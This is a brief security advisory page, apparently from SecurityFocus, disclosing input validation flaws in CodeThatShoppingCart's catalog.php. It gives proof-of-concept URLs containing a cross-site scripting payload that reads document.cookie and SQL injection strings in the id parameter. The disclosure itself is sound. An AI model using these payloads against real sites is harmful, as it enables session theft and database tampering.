CodeThat.com CodeThatShoppingCart Multiple Input Validation Vulnerabilities

An exploit is not required.

Proof of concept examples are available:

http://www.example.com/codethat/catalog.php?action=category_show
&id=2"><script>alert(document.cookie)</script>

http://www.example.com/shoppingcart/catalog.php?action=category_show
&id=1%20or%20like%20%60a%%60

http://www.example.com/shoppingcart/demo/catalog.php?action=
category_show&id=1%20or%201=1


 

Privacy Statement
Copyright 2010, SecurityFocus